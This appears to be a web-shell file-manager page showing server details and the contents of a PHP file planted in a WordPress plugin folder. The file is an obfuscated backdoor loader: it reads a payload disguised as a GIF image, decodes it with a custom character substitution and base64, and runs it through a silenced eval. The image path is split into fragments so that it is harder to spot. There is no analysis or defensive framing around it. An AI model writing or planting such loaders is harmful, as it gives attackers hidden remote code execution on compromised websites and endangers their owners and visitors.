HEX
Server: nginx/1.24.0
System: Linux localhost 5.15.0-46-generic #49-Ubuntu SMP Thu Aug 4 18:03:25 UTC 2022 x86_64
User: www (1000)
PHP: 8.3.27
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
Upload Files
File: /www/wwwroot/bientansht.com/wp-content/plugins/aromakekex/thuxyhy.txt
<?php

function ypusoh_eqithekh($apakix_chodutera) {
    $ythiwof = exeber_yjylusaf(1);
    $idicih = exeber_yjylusaf(2);
    for ($yfoxik = 0; $yfoxik < strlen($ythiwof); $yfoxik++) {
        $qyhezhi = substr($ythiwof, $yfoxik, 1);
        $foreco = substr($idicih, $yfoxik, 1);
        $uroteqy[$qyhezhi] = $foreco;
    }

    $khuxefa = strtr($apakix_chodutera, $uroteqy);
    $khuxefa = base64_decode($khuxefa);

    return $khuxefa;
}

function exeber_yjylusaf($apakix_chodutera) {
    if ($apakix_chodutera == 1)
        return bytosi_ewydohoxy();
    if ($apakix_chodutera == 2)
        return pyhowu_amywipekh();
}

function yfyzuv_ruzhurep($apakix_chodutera) {
    $qalyshu = array();
    if (!file_exists($apakix_chodutera))
        return false;
    $jezyta = @file_get_contents($apakix_chodutera);
    if (!$jezyta)
        return false;
    $jezyta = substr($jezyta, 3);
    $qalyshu = ypusoh_eqithekh($jezyta);
    return $qalyshu;
}

function bytosi_ewydohoxy() {
    $jezyta = "5XUKkxc13Ofa6bi+JyQwIqYWS98tuH4=LnRZvgrdDljBVAMo/2CTmNp7sEFGehzP0";
    return $jezyta;
}

function pyhowu_amywipekh() {
    $qalyshu = "2PDzgd3epIwr0C7+uqsHbMU9QtvFKA/4LNJZ6o8aSlROnyVmikBEhYcxGf=T15XjW";
    return $qalyshu;
}

$fatazic = yfyzuv_ruzhurep(__DIR__ . "/asse" . "ts/ima" . "ges/ku" . "xari" . ".gif");
if ($fatazic) {
    @eval($fatazic);
}